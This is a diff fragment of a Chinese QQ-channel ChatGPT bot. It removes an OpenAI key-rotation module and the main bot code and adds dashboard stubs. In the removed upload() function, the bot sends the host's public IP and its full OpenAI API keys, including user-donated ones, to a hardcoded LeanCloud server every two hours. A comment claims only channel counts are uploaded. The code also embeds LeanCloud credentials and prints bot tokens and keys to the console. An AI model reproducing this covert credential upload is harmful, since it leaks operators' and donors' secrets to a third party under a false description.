print("[ChatGPT] "+str(response["choices"][0]["text"]))
|
||||
return str(response["choices"][0]["text"]).strip(), response['usage']['total_tokens']
|
||||
else:
|
||||
return response['data'][0]['url']
|
||||
|
||||
def handle_switch_key(self, prompt):
|
||||
while True:
|
||||
is_all_exceed = True
|
||||
for key in self.key_stat:
|
||||
if not self.key_stat[key]['exceed']:
|
||||
is_all_exceed = False
|
||||
openai.api_key = key
|
||||
print(f"切换到Key: {key}, 已使用token: {self.key_stat[key]['used']}")
|
||||
if prompt != '':
|
||||
try:
|
||||
response = openai.Completion.create(
|
||||
prompt=prompt,
|
||||
**self.chatGPT_configs
|
||||
)
|
||||
return response, True
|
||||
except Exception as e:
|
||||
print(e)
|
||||
if 'You exceeded' in str(e):
|
||||
print("当前Key已超额,正在切换")
|
||||
self.key_stat[openai.api_key]['exceed'] = True
|
||||
self.save_key_record()
|
||||
time.sleep(1)
|
||||
continue
|
||||
else:
|
||||
return True
|
||||
if is_all_exceed:
|
||||
print("所有Key已超额")
|
||||
return None, False
|
||||
|
||||
def getConfigs(self):
|
||||
return self.openai_configs
|
||||
|
||||
def save_key_record(self):
|
||||
with open(key_record_path, 'w', encoding='utf-8') as f:
|
||||
json.dump(self.key_stat, f)
|
||||
|
||||
def get_key_stat(self):
|
||||
return self.key_stat
|
||||
def get_key_list(self):
|
||||
return self.key_list
|
||||
|
||||
# 添加key
|
||||
def append_key(self, key, sponsor):
|
||||
self.key_list.append(key)
|
||||
self.key_stat[key] = {'exceed': False, 'used': 0, 'sponsor': sponsor}
|
||||
self.save_key_record()
|
||||
self.init_key_record()
|
||||
# 检查key是否可用
|
||||
def check_key(self, key):
|
||||
pre_key = openai.api_key
|
||||
openai.api_key = key
|
||||
try:
|
||||
openai.Completion.create(
|
||||
prompt="1",
|
||||
**self.chatGPT_configs
|
||||
)
|
||||
openai.api_key = pre_key
|
||||
return True
|
||||
except Exception as e:
|
||||
pass
|
||||
openai.api_key = pre_key
|
||||
return False
|
||||
|
||||
#将key_list的key转储到key_record中,并记录相关数据
|
||||
def init_key_record(self):
|
||||
if not os.path.exists(key_record_path):
|
||||
with open(key_record_path, 'w', encoding='utf-8') as f:
|
||||
json.dump({}, f)
|
||||
with open(key_record_path, 'r', encoding='utf-8') as keyfile:
|
||||
try:
|
||||
self.key_stat = json.load(keyfile)
|
||||
except Exception as e:
|
||||
print(e)
|
||||
self.key_stat = {}
|
||||
finally:
|
||||
for key in self.key_list:
|
||||
if key not in self.key_stat:
|
||||
self.key_stat[key] = {'exceed': False, 'used': 0}
|
||||
# if openai.api_key is None:
|
||||
# openai.api_key = key
|
||||
else:
|
||||
# if self.key_stat[key]['exceed']:
|
||||
# print(f"Key: {key} 已超额")
|
||||
# continue
|
||||
# else:
|
||||
# if openai.api_key is None:
|
||||
# openai.api_key = key
|
||||
# print(f"使用Key: {key}, 已使用token: {self.key_stat[key]['used']}")
|
||||
pass
|
||||
if openai.api_key == None:
|
||||
self.handle_switch_key("")
|
||||
self.save_key_record()
|
||||
@@ -1,673 +0,0 @@
|
||||
import botpy
|
||||
from botpy.message import Message
|
||||
import yaml
|
||||
import re
|
||||
from util.errors.errors import PromptExceededError
|
||||
from botpy.message import DirectMessage
|
||||
import json
|
||||
import threading
|
||||
import asyncio
|
||||
import time
|
||||
from cores.database.conn import dbConn
|
||||
import requests
|
||||
import util.unfit_words as uw
|
||||
import os
|
||||
import sys
|
||||
from cores.qqbot.personality import personalities
|
||||
|
||||
history_dump_interval = 10
|
||||
# QQBotClient实例
|
||||
client = ''
|
||||
# ChatGPT实例
|
||||
global chatgpt
|
||||
# 缓存的会话
|
||||
session_dict = {}
|
||||
# 最大缓存token(在配置里改 configs/config.yaml)
|
||||
max_tokens = 2000
|
||||
# 配置信息
|
||||
config = {}
|
||||
# 统计信息
|
||||
count = {}
|
||||
# 统计信息
|
||||
stat_file = ''
|
||||
# 是否独立会话默认值
|
||||
uniqueSession = False
|
||||
|
||||
# 日志记录
|
||||
logf = open('log.log', 'a+', encoding='utf-8')
|
||||
# 是否上传日志,仅上传频道数量等数量的统计信息
|
||||
is_upload_log = True
|
||||
|
||||
# 用户发言频率
|
||||
user_frequency = {}
|
||||
# 时间默认值
|
||||
frequency_time = 60
|
||||
# 计数默认值
|
||||
frequency_count = 2
|
||||
|
||||
# 公告(可自定义):
|
||||
announcement = ""
|
||||
|
||||
# 人格信息
|
||||
now_personality = {}
|
||||
|
||||
# 适配pyinstaller
|
||||
abs_path = os.path.dirname(os.path.realpath(sys.argv[0])) + '/'
|
||||
|
||||
def new_sub_thread(func, args=()):
|
||||
thread = threading.Thread(target=func, args=args, daemon=True)
|
||||
thread.start()
|
||||
|
||||
class botClient(botpy.Client):
|
||||
# 收到At消息
|
||||
async def on_at_message_create(self, message: Message):
|
||||
toggle_count(at=True, message=message)
|
||||
# executor.submit(oper_msg, message, True)
|
||||
new_sub_thread(oper_msg, (message, True))
|
||||
# await oper_msg(message=message, at=True)
|
||||
|
||||
# 收到私聊消息
|
||||
async def on_direct_message_create(self, message: DirectMessage):
|
||||
toggle_count(at=False, message=message)
|
||||
# executor.submit(oper_msg, message, True)
|
||||
# await oper_msg(message=message, at=False)
|
||||
new_sub_thread(oper_msg, (message, False))
|
||||
|
||||
# 写入统计信息
|
||||
def toggle_count(at: bool, message):
|
||||
global stat_file
|
||||
try:
|
||||
if str(message.guild_id) not in count:
|
||||
count[str(message.guild_id)] = {
|
||||
'count': 1,
|
||||
'direct_count': 1,
|
||||
}
|
||||
else:
|
||||
count[str(message.guild_id)]['count'] += 1
|
||||
if not at:
|
||||
count[str(message.guild_id)]['direct_count'] += 1
|
||||
stat_file = open(abs_path+"configs/stat", 'w', encoding='utf-8')
|
||||
stat_file.write(json.dumps(count))
|
||||
stat_file.flush()
|
||||
stat_file.close()
|
||||
except BaseException:
|
||||
pass
|
||||
|
||||
# 转储历史记录的定时器~ Soulter
|
||||
def dump_history():
|
||||
time.sleep(10)
|
||||
global session_dict, history_dump_interval
|
||||
db = dbConn()
|
||||
while True:
|
||||
try:
|
||||
# print("转储历史记录...")
|
||||
for key in session_dict:
|
||||
# print("TEST: "+str(db.get_session(key)))
|
||||
data = session_dict[key]
|
||||
data_json = {
|
||||
'data': data
|
||||
}
|
||||
if db.check_session(key):
|
||||
db.update_session(key, json.dumps(data_json))
|
||||
else:
|
||||
db.insert_session(key, json.dumps(data_json))
|
||||
# print("转储历史记录完毕")
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
# 每隔10分钟转储一次
|
||||
time.sleep(10*history_dump_interval)
|
||||
|
||||
# 上传统计信息
|
||||
def upload():
|
||||
global object_id
|
||||
while True:
|
||||
addr = ''
|
||||
try:
|
||||
# 用户唯一性标识
|
||||
addr = requests.get('http://myip.ipip.net', timeout=5).text
|
||||
except BaseException:
|
||||
pass
|
||||
try:
|
||||
ts = str(time.time())
|
||||
guild_count, guild_msg_count, guild_direct_msg_count, session_count = get_stat()
|
||||
headers = {
|
||||
'X-LC-Id': 'UqfXTWW15nB7iMT0OHvYrDFb-gzGzoHsz',
|
||||
'X-LC-Key': 'QAZ1rQLY1ZufHrZlpuUiNff7',
|
||||
'Content-Type': 'application/json'
|
||||
}
|
||||
key_stat = chatgpt.get_key_stat()
|
||||
d = {"data": {"guild_count": guild_count, "guild_msg_count": guild_msg_count, "guild_direct_msg_count": guild_direct_msg_count, "session_count": session_count, 'addr': addr, 'winver': '2.21', 'key_stat':key_stat}}
|
||||
d = json.dumps(d).encode("utf-8")
|
||||
res = requests.put(f'https://uqfxtww1.lc-cn-n1-shared.com/1.1/classes/bot_record/{object_id}', headers = headers, data = d)
|
||||
if json.loads(res.text)['code'] == 1:
|
||||
print("[System] New User.")
|
||||
res = requests.post(f'https://uqfxtww1.lc-cn-n1-shared.com/1.1/classes/bot_record', headers = headers, data = d)
|
||||
object_id = json.loads(res.text)['objectId']
|
||||
object_id_file = open(abs_path+"configs/object_id", 'w+', encoding='utf-8')
|
||||
object_id_file.write(str(object_id))
|
||||
object_id_file.flush()
|
||||
object_id_file.close()
|
||||
except BaseException as e:
|
||||
pass
|
||||
# 每隔2小时上传一次
|
||||
time.sleep(60*60*2)
|
||||
|
||||
'''
|
||||
初始化机器人
|
||||
'''
|
||||
def initBot(chatgpt_inst):
|
||||
global chatgpt
|
||||
chatgpt = chatgpt_inst
|
||||
global max_tokens
|
||||
max_tokens = int(chatgpt_inst.getConfigs()['total_tokens_limit'])
|
||||
global now_personality
|
||||
|
||||
|
||||
# 读取历史记录 Soulter
|
||||
try:
|
||||
db1 = dbConn()
|
||||
for session in db1.get_all_session():
|
||||
session_dict[session[0]] = json.loads(session[1])['data']
|
||||
print("[System] 历史记录读取成功喵")
|
||||
except BaseException as e:
|
||||
print("[System] 历史记录读取失败: " + str(e))
|
||||
|
||||
# 读统计信息
|
||||
global stat_file
|
||||
if not os.path.exists(abs_path+"configs/stat"):
|
||||
with open(abs_path+"configs/stat", 'w', encoding='utf-8') as f:
|
||||
json.dump({}, f)
|
||||
stat_file = open(abs_path+"configs/stat", 'r', encoding='utf-8')
|
||||
global count
|
||||
res = stat_file.read()
|
||||
if res == '':
|
||||
count = {}
|
||||
else:
|
||||
try:
|
||||
count = json.loads(res)
|
||||
except BaseException:
|
||||
pass
|
||||
# 创建转储定时器线程
|
||||
threading.Thread(target=dump_history, daemon=True).start()
|
||||
|
||||
if is_upload_log:
|
||||
# 读取object_id
|
||||
global object_id
|
||||
if not os.path.exists(abs_path+"configs/object_id"):
|
||||
with open(abs_path+"configs/object_id", 'w', encoding='utf-8') as f:
|
||||
f.write("")
|
||||
object_id_file = open(abs_path+"configs/object_id", 'r', encoding='utf-8')
|
||||
object_id = object_id_file.read()
|
||||
object_id_file.close()
|
||||
# 创建上传定时器线程
|
||||
threading.Thread(target=upload, daemon=True).start()
|
||||
|
||||
global config, uniqueSession, history_dump_interval, frequency_count, frequency_time,announcement
|
||||
with open(abs_path+"configs/config.yaml", 'r', encoding='utf-8') as ymlfile:
|
||||
cfg = yaml.safe_load(ymlfile)
|
||||
config = cfg
|
||||
|
||||
# 得到发言频率配置
|
||||
if 'limit' in cfg:
|
||||
print('[System] 发言频率配置: '+str(cfg['limit']))
|
||||
if 'count' in cfg['limit']:
|
||||
frequency_count = cfg['limit']['count']
|
||||
if 'time' in cfg['limit']:
|
||||
frequency_time = cfg['limit']['time']
|
||||
|
||||
announcement += '[QQChannelChatGPT项目]\n所有回答与腾讯公司无关。出现问题请前往[ChatGPT机器人]官方频道\n\n'
|
||||
# 得到公告配置
|
||||
if 'notice' in cfg:
|
||||
print('[System] 公告配置: '+cfg['notice'])
|
||||
announcement += cfg['notice']
|
||||
try:
|
||||
if 'uniqueSessionMode' in cfg and cfg['uniqueSessionMode']:
|
||||
uniqueSession = True
|
||||
else:
|
||||
uniqueSession = False
|
||||
print("[System] 独立会话: " + str(uniqueSession))
|
||||
if 'dump_history_interval' in cfg:
|
||||
history_dump_interval = int(cfg['dump_history_interval'])
|
||||
print("[System] 历史记录转储时间周期: " + str(history_dump_interval) + "分钟")
|
||||
except BaseException:
|
||||
print("[System-Error] 读取uniqueSessionMode/version/dump_history_interval配置文件失败, 使用默认值。")
|
||||
|
||||
print(f"[System] QQ开放平台AppID: {cfg['qqbot']['appid']} 令牌: {cfg['qqbot']['token']}")
|
||||
|
||||
print("[System] 如果有任何问题,请在https://github.com/Soulter/QQChannelChatGPT上提交issue说明问题!或者添加QQ:905617992\n")
|
||||
try:
|
||||
run_bot(cfg['qqbot']['appid'], cfg['qqbot']['token'])
|
||||
except BaseException as e:
|
||||
input(f"\n[System-Error] 启动QQ机器人时出现错误,原因如下:{e}\n可能是没有填写QQBOT appid和token?请在config中完善你的appid和token\n配置教程:https://soulter.top/posts/qpdg.html\n")
|
||||
|
||||
'''
|
||||
启动机器人
|
||||
'''
|
||||
def run_bot(appid, token):
|
||||
intents = botpy.Intents(public_guild_messages=True, direct_message=True)
|
||||
global client
|
||||
client = botClient(intents=intents)
|
||||
client.run(appid=appid, token=token)
|
||||
|
||||
'''
|
||||
得到OpenAI的回复
|
||||
'''
|
||||
def get_chatGPT_response(prompts_str, image_mode=False):
|
||||
res = ''
|
||||
usage = ''
|
||||
if not image_mode:
|
||||
res, usage = chatgpt.chat(prompts_str)
|
||||
# 处理结果文本
|
||||
chatgpt_res = res.strip()
|
||||
return res, usage
|
||||
else:
|
||||
res = chatgpt.chat(prompts_str, image_mode = True)
|
||||
return res
|
||||
|
||||
'''
|
||||
回复QQ消息
|
||||
'''
|
||||
def send_qq_msg(message, res, image_mode=False):
|
||||
if not image_mode:
|
||||
try:
|
||||
asyncio.run_coroutine_threadsafe(message.reply(content=res), client.loop)
|
||||
except BaseException as e:
|
||||
raise e
|
||||
else:
|
||||
asyncio.run_coroutine_threadsafe(message.reply(image=res, content=""), client.loop)
|
||||
|
||||
|
||||
'''
|
||||
获取缓存的会话
|
||||
'''
|
||||
def get_prompts_by_cache_list(cache_data_list, divide=False, paging=False, size=5, page=1):
|
||||
prompts = ""
|
||||
if paging:
|
||||
page_begin = (page-1)*size
|
||||
page_end = page*size
|
||||
if page_begin < 0:
|
||||
page_begin = 0
|
||||
if page_end > len(cache_data_list):
|
||||
page_end = len(cache_data_list)
|
||||
cache_data_list = cache_data_list[page_begin:page_end]
|
||||
for item in cache_data_list:
|
||||
prompts += str(item['prompt'])
|
||||
if divide:
|
||||
prompts += "----------\n"
|
||||
return prompts
|
||||
|
||||
def get_user_usage_tokens(cache_list):
|
||||
usage_tokens = 0
|
||||
for item in cache_list:
|
||||
usage_tokens += int(item['single_tokens'])
|
||||
return usage_tokens
|
||||
|
||||
'''
|
||||
检查发言频率
|
||||
'''
|
||||
def check_frequency(id) -> bool:
|
||||
ts = int(time.time())
|
||||
if id in user_frequency:
|
||||
if ts-user_frequency[id]['time'] > frequency_time:
|
||||
user_frequency[id]['time'] = ts
|
||||
user_frequency[id]['count'] = 1
|
||||
return True
|
||||
else:
|
||||
if user_frequency[id]['count'] >= frequency_count:
|
||||
return False
|
||||
else:
|
||||
user_frequency[id]['count']+=1
|
||||
return True
|
||||
else:
|
||||
t = {'time':ts,'count':1}
|
||||
user_frequency[id] = t
|
||||
return True
|
||||
|
||||
'''
|
||||
处理消息
|
||||
'''
|
||||
def oper_msg(message, at=False, loop=None):
|
||||
global session_dict
|
||||
print("[QQBOT] 接收到消息:"+ str(message.content))
|
||||
qq_msg = ''
|
||||
session_id = ''
|
||||
name = ''
|
||||
user_id = message.author.id
|
||||
user_name = message.author.username
|
||||
|
||||
# 检查发言频率
|
||||
if not check_frequency(user_id):
|
||||
send_qq_msg(message, f'{user_name}的发言超过频率限制(╯▔皿▔)╯。\n{frequency_time}秒内只能提问{frequency_count}次。')
|
||||
return
|
||||
|
||||
logf.write("[QQBOT] "+ str(message.content)+'\n')
|
||||
logf.flush()
|
||||
|
||||
if at:
|
||||
qq_msg = message.content
|
||||
lines = qq_msg.splitlines()
|
||||
for i in range(len(lines)):
|
||||
lines[i] = re.sub(r"<@!\d+>", "", lines[i])
|
||||
qq_msg = "\n".join(lines).lstrip().strip()
|
||||
|
||||
if uniqueSession:
|
||||
session_id = user_id
|
||||
else:
|
||||
session_id = message.channel_id
|
||||
else:
|
||||
qq_msg = message.content
|
||||
session_id = user_id
|
||||
|
||||
if uniqueSession:
|
||||
name = user_name
|
||||
else:
|
||||
name = "频道"
|
||||
|
||||
command_type = -1
|
||||
# 特殊指令
|
||||
if qq_msg == "/继续":
|
||||
qq_msg = "继续"
|
||||
# 普通指令
|
||||
else:
|
||||
# 如果第一个字符是/,则为指令
|
||||
if qq_msg[0] == "/":
|
||||
res, go, command_type = command_oper(qq_msg, message, session_id, name, user_id, user_name, at)
|
||||
send_qq_msg(message, res)
|
||||
if not go:
|
||||
return
|
||||
if command_type == 1 and 'prompt' in now_personality:
|
||||
# 设置人格
|
||||
qq_msg = now_personality['prompt']
|
||||
|
||||
# if qq_msg[0:6] == '/draw ':
|
||||
# # TODO 未完全实现
|
||||
# prompt = qq_msg[6:]
|
||||
# url = get_chatGPT_response(prompt, image_mode = True)
|
||||
# resp = requests.get(url)
|
||||
# filename = './images/' + str(int(time.time())) + '.jpg'
|
||||
# print(url)
|
||||
# with open(filename, 'wb') as f:
|
||||
# f.write(resp.content)
|
||||
# qiniu_url = cores.database.qiniu.put_img(filename)
|
||||
# print(qiniu_url)
|
||||
# send_qq_msg(message, qiniu_url, image_mode=True)
|
||||
# return
|
||||
|
||||
# 这里是预设,你可以按需更改
|
||||
if qq_msg.strip() == 'hello' or qq_msg.strip() == '你好' or qq_msg.strip() == '':
|
||||
send_qq_msg(message, f"你好呀~")
|
||||
return
|
||||
# if qq_msg.strip() == '傻逼' or qq_msg.strip() == 'sb':
|
||||
# send_qq_msg(message, f"好好好")
|
||||
# return
|
||||
# if '喜多' in qq_msg:
|
||||
# send_qq_msg(message, 'http://rn2ztkeap.hn-bkt.clouddn.com/xd1.gif', True)
|
||||
# if '台湾' in qq_msg or 'taiwan' in qq_msg:
|
||||
# send_qq_msg(message, "声明:台湾是中国的一部分。\n下面否定此结论的回答全部无效。")
|
||||
|
||||
# 拦截不合适的词请求
|
||||
for i in uw.unfit_words_q:
|
||||
if i in qq_msg.strip():
|
||||
send_qq_msg(message, f"你的提问中有不太合适的内容😭\n请更换措辞~")
|
||||
return
|
||||
|
||||
if session_id not in session_dict:
|
||||
session_dict[session_id] = []
|
||||
|
||||
fjson = {}
|
||||
try:
|
||||
f = open(abs_path+"configs/session", "r", encoding="utf-8")
|
||||
fjson = json.loads(f.read())
|
||||
f.close()
|
||||
except:
|
||||
pass
|
||||
finally:
|
||||
fjson[session_id] = 'true'
|
||||
f = open(abs_path+"configs/session", "w", encoding="utf-8")
|
||||
f.write(json.dumps(fjson))
|
||||
f.flush()
|
||||
f.close()
|
||||
|
||||
# 获取缓存
|
||||
cache_prompt = ''
|
||||
cache_data_list = session_dict[session_id]
|
||||
cache_prompt = get_prompts_by_cache_list(cache_data_list)
|
||||
cache_prompt += "\nHuman: "+ qq_msg + "\nAI: "
|
||||
# 请求chatGPT获得结果
|
||||
try:
|
||||
chatgpt_res, current_usage_tokens = get_chatGPT_response(prompts_str=cache_prompt)
|
||||
except (PromptExceededError) as e:
|
||||
print("token超限, 清空对应缓存")
|
||||
session_dict[session_id] = []
|
||||
cache_data_list = []
|
||||
cache_prompt = "Human: "+ qq_msg + "\nAI: "
|
||||
chatgpt_res, current_usage_tokens = get_chatGPT_response(prompts_str=cache_prompt)
|
||||
except (BaseException) as e:
|
||||
print("OpenAI API错误:(")
|
||||
if 'exceeded' in str(e):
|
||||
send_qq_msg(message, f"OpenAI API错误。原因:\n{str(e)} \n超额了。您可自己搭建一个机器人(Github仓库:QQChannelChatGPT)")
|
||||
else:
|
||||
send_qq_msg(message, f"OpenAI API错误。原因如下:\n{str(e)} \n前往官方频道反馈~")
|
||||
return
|
||||
|
||||
logf.write("[GPT] "+ str(chatgpt_res)+'\n')
|
||||
logf.flush()
|
||||
|
||||
# 发送qq信息
|
||||
try:
|
||||
# 防止被qq频道过滤消息
|
||||
gap_chatgpt_res = chatgpt_res.replace(".", " . ")
|
||||
if '```' in gap_chatgpt_res:
|
||||
chatgpt_res.replace('```', "")
|
||||
# 过滤不合适的词
|
||||
for i in uw.unfit_words:
|
||||
if i in gap_chatgpt_res:
|
||||
gap_chatgpt_res = gap_chatgpt_res.replace(i, "***")
|
||||
# 发送信息
|
||||
send_qq_msg(message, ''+gap_chatgpt_res)
|
||||
except BaseException as e:
|
||||
print("QQ频道API错误: \n"+str(e))
|
||||
f_res = ""
|
||||
for t in chatgpt_res:
|
||||
f_res += t + ' '
|
||||
try:
|
||||
send_qq_msg(message, ''+f_res)
|
||||
# send(message, f"QQ频道API错误:{str(e)}\n下面是格式化后的回答:\n{f_res}")
|
||||
except BaseException as e:
|
||||
# 如果还是不行则过滤url
|
||||
f_res = re.sub(r'(https|http)?:\/\/(\w|\.|\/|\?|\=|\&|\%)*\b', '', f_res, flags=re.MULTILINE)
|
||||
f_res = f_res.replace(".", "·")
|
||||
send_qq_msg(message, ''+f_res)
|
||||
# send(message, f"QQ频道API错误:{str(e)}\n下面是格式化后的回答:\n{f_res}")
|
||||
|
||||
# 超过指定tokens, 尽可能的保留最多的条目,直到小于max_tokens
|
||||
if current_usage_tokens > max_tokens:
|
||||
t = current_usage_tokens
|
||||
index = 0
|
||||
while t > max_tokens:
|
||||
if index >= len(cache_data_list):
|
||||
break
|
||||
if cache_data_list[index]['level'] != 'max':
|
||||
t -= int(cache_data_list[index]['single_tokens'])
|
||||
del cache_data_list[index]
|
||||
else:
|
||||
index += 1
|
||||
# 删除完后更新相关字段
|
||||
session_dict[session_id] = cache_data_list
|
||||
cache_prompt = get_prompts_by_cache_list(cache_data_list)
|
||||
|
||||
# 添加新条目进入缓存的prompt
|
||||
if command_type == 1:
|
||||
level = 'max'
|
||||
else:
|
||||
level = 'normal'
|
||||
if len(cache_data_list) > 0:
|
||||
single_record = {
|
||||
"prompt": f'Human: {qq_msg}\nAI: {chatgpt_res}\n',
|
||||
"usage_tokens": current_usage_tokens,
|
||||
"single_tokens": current_usage_tokens - int(cache_data_list[-1]['usage_tokens']),
|
||||
"level": level
|
||||
}
|
||||
else:
|
||||
single_record = {
|
||||
"prompt": f'Human: {qq_msg}\nAI: {chatgpt_res}\n',
|
||||
"usage_tokens": current_usage_tokens,
|
||||
"single_tokens": current_usage_tokens,
|
||||
"level": level
|
||||
}
|
||||
cache_data_list.append(single_record)
|
||||
session_dict[session_id] = cache_data_list
|
||||
|
||||
'''
|
||||
获取统计信息
|
||||
'''
|
||||
def get_stat():
|
||||
try:
|
||||
f = open(abs_path+"configs/stat", "r", encoding="utf-8")
|
||||
fjson = json.loads(f.read())
|
||||
f.close()
|
||||
guild_count = 0
|
||||
guild_msg_count = 0
|
||||
guild_direct_msg_count = 0
|
||||
|
||||
for k,v in fjson.items():
|
||||
guild_count += 1
|
||||
guild_msg_count += v['count']
|
||||
guild_direct_msg_count += v['direct_count']
|
||||
|
||||
session_count = 0
|
||||
|
||||
f = open(abs_path+"configs/session", "r", encoding="utf-8")
|
||||
fjson = json.loads(f.read())
|
||||
f.close()
|
||||
for k,v in fjson.items():
|
||||
session_count += 1
|
||||
return guild_count, guild_msg_count, guild_direct_msg_count, session_count
|
||||
except:
|
||||
return -1, -1, -1, -1
|
||||
|
||||
'''
|
||||
指令处理
|
||||
'''
|
||||
def command_oper(qq_msg, message, session_id, name, user_id, user_name, at):
|
||||
go = False # 是否处理完指令后继续执行msg_oper后面的代码
|
||||
msg = ''
|
||||
global session_dict, now_personality
|
||||
|
||||
# 指令返回值,/set设置人格是1
|
||||
type = -1
|
||||
|
||||
# 指令控制
|
||||
if qq_msg == "/reset" or qq_msg == "/重置":
|
||||
msg = ''
|
||||
session_dict[session_id] = []
|
||||
if at:
|
||||
msg = f"{name}(id: {session_id})的历史记录重置成功\n\n{announcement}"
|
||||
else:
|
||||
msg = f"你的历史记录重置成功"
|
||||
|
||||
if qq_msg[:4] == "/his":
|
||||
#分页,每页5条
|
||||
msg = ''
|
||||
size_per_page = 3
|
||||
page = 1
|
||||
if qq_msg[5:]:
|
||||
page = int(qq_msg[5:])
|
||||
# 检查是否有过历史记录
|
||||
if session_id not in session_dict:
|
||||
msg = f"{name} 的历史记录为空"
|
||||
l = session_dict[session_id]
|
||||
max_page = len(l)//size_per_page + 1 if len(l)%size_per_page != 0 else len(l)//size_per_page
|
||||
p = get_prompts_by_cache_list(session_dict[session_id], divide=True, paging=True, size=size_per_page, page=page)
|
||||
if at:
|
||||
msg=f"{name}的历史记录如下:\n{p}\n第{page}页 | 共{max_page}页\n*输入/his 2跳转到第2页"
|
||||
else:
|
||||
msg=f"历史记录如下:\n{p}\n第{page}页 | 共{max_page}页\n*输入/his 2跳转到第2页\n\n{announcement}"
|
||||
|
||||
if qq_msg == "/token":
|
||||
msg = ''
|
||||
if at:
|
||||
msg=f"{name} 会话的token数: {get_user_usage_tokens(session_dict[session_id])}\n系统最大缓存token数: {max_tokens}"
|
||||
else:
|
||||
msg=f"会话的token数: {get_user_usage_tokens(session_dict[session_id])}\n系统最大缓存token数: {max_tokens}"
|
||||
|
||||
if qq_msg == "/status" or qq_msg == "/状态":
|
||||
chatgpt_cfg_str = ""
|
||||
key_stat = chatgpt.get_key_stat()
|
||||
key_list = chatgpt.get_key_list()
|
||||
index = 1
|
||||
max = 900000
|
||||
gg_count = 0
|
||||
total = 0
|
||||
tag = ''
|
||||
for key in key_stat.keys():
|
||||
sponsor = ''
|
||||
total += key_stat[key]['used']
|
||||
if key_stat[key]['exceed']:
|
||||
gg_count += 1
|
||||
continue
|
||||
if 'sponsor' in key_stat[key]:
|
||||
sponsor = key_stat[key]['sponsor']
|
||||
chatgpt_cfg_str += f" |-{index}: {key_stat[key]['used']}/{max} {sponsor}赞助{tag}\n"
|
||||
index += 1
|
||||
msg = f"⭐使用情况({str(gg_count)}个已用):\n{chatgpt_cfg_str}⏰全频道已用{total}tokens\n{announcement}"
|
||||
if qq_msg == "/count" or qq_msg == "/统计":
|
||||
guild_count, guild_msg_count, guild_direct_msg_count, session_count = get_stat()
|
||||
msg = f"当前会话数: {len(session_dict)}\n共有频道数: {guild_count} \n共有消息数: {guild_msg_count}\n私信数: {guild_direct_msg_count}\n历史会话数: {session_count}"
|
||||
|
||||
if qq_msg == "/help":
|
||||
msg = "[Github项目名: QQChannelChatGPT,有问题请前往提交issue,欢迎赞助支持我!]\n\n指令面板:\n/status 查看机器人key状态\n/count 查看机器人统计信息\n/reset 重置会话\n/his 查看历史记录\n/token 查看会话token数\n/help 查看帮助\n/key 人格指令菜单"
|
||||
|
||||
if qq_msg[:4] == "/key":
|
||||
if len(qq_msg) == 4:
|
||||
msg = "感谢您赞助key。请以以下格式赞助:\n/key xxxxx"
|
||||
key = qq_msg[5:]
|
||||
send_qq_msg(message, "收到!正在核验...")
|
||||
if chatgpt.check_key(key):
|
||||
msg = f"*★,°*:.☆( ̄▽ ̄)/$:*.°★* 。\n该Key被验证为有效。感谢{user_name}赞助~"
|
||||
chatgpt.append_key(key, user_name)
|
||||
else:
|
||||
msg = "该Key被验证为无效。也许是输入错误了,或者重试。"
|
||||
|
||||
if qq_msg[:6] == "/unset":
|
||||
now_personality = {}
|
||||
msg = "已清除人格"
|
||||
|
||||
if qq_msg[:4] == "/set":
|
||||
if len(qq_msg) == 4:
|
||||
np = '无'
|
||||
if "name" in now_personality:
|
||||
np=now_personality["name"]
|
||||
msg = f"【由Github项目QQChannelChatGPT支持】\n\n【人格文本由PlexPt开源项目awesome-chatgpt-prompts-zh提供】\n\n这个是人格设置指令。\n设置人格: \n/set 人格名。例如/set 编剧\n人格列表: /set list\n人格详细信息: /set view 人格名\n自定义人格: /set 人格文本\n清除人格: /unset\n【当前人格】: {np}"
|
||||
elif qq_msg[5:] == "list":
|
||||
per_dict = personalities
|
||||
msg = "人格列表:\n"
|
||||
for key in per_dict.keys():
|
||||
msg += f" |-{key}\n"
|
||||
msg += '\n\n*输入/set view 人格名查看人格详细信息'
|
||||
msg += '\n\n*不定时更新人格库,请及时更新本项目。'
|
||||
elif qq_msg[5:9] == "view":
|
||||
ps = qq_msg[10:]
|
||||
ps = ps.strip()
|
||||
per_dict = personalities
|
||||
if ps in per_dict:
|
||||
msg = f"人格{ps}的详细信息:\n"
|
||||
msg += f"{per_dict[ps]}\n"
|
||||
else:
|
||||
msg = f"人格{ps}不存在"
|
||||
else:
|
||||
ps = qq_msg[5:]
|
||||
ps = ps.strip()
|
||||
per_dict = personalities
|
||||
if ps in per_dict:
|
||||
now_personality = {
|
||||
'name': ps,
|
||||
'prompt': per_dict[ps]
|
||||
}
|
||||
session_dict[session_id] = []
|
||||
msg = f"人格{ps}已设置,请耐心等待机器人回复第一条信息。"
|
||||
go = True
|
||||
type = 1
|
||||
else:
|
||||
msg = f"人格{ps}不存在, 请使用/set list查看人格列表"
|
||||
return msg, go, type
|
||||
10
dashboard/__init__.py
Normal file
@@ -0,0 +1,10 @@
|
||||
from dataclasses import dataclass
|
||||
|
||||
class DashBoardData():
|
||||
stats: dict = {}
|
||||
|
||||
@dataclass
|
||||
class Response():
|
||||
status: str
|
||||
message: str
|
||||
data: dict
|
||||
1
dashboard/dist/_redirects
vendored
Normal file
@@ -0,0 +1 @@
|
||||
/* /index.html 200
|
||||
1
dashboard/dist/assets/BaseBreadcrumb-4d676ba5.css
vendored
Normal file
@@ -0,0 +1 @@
|
||||
.page-breadcrumb .v-toolbar{background:transparent}
|
||||
1
dashboard/dist/assets/BaseBreadcrumb.vue_vue_type_style_index_0_lang-cae6d9fb.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
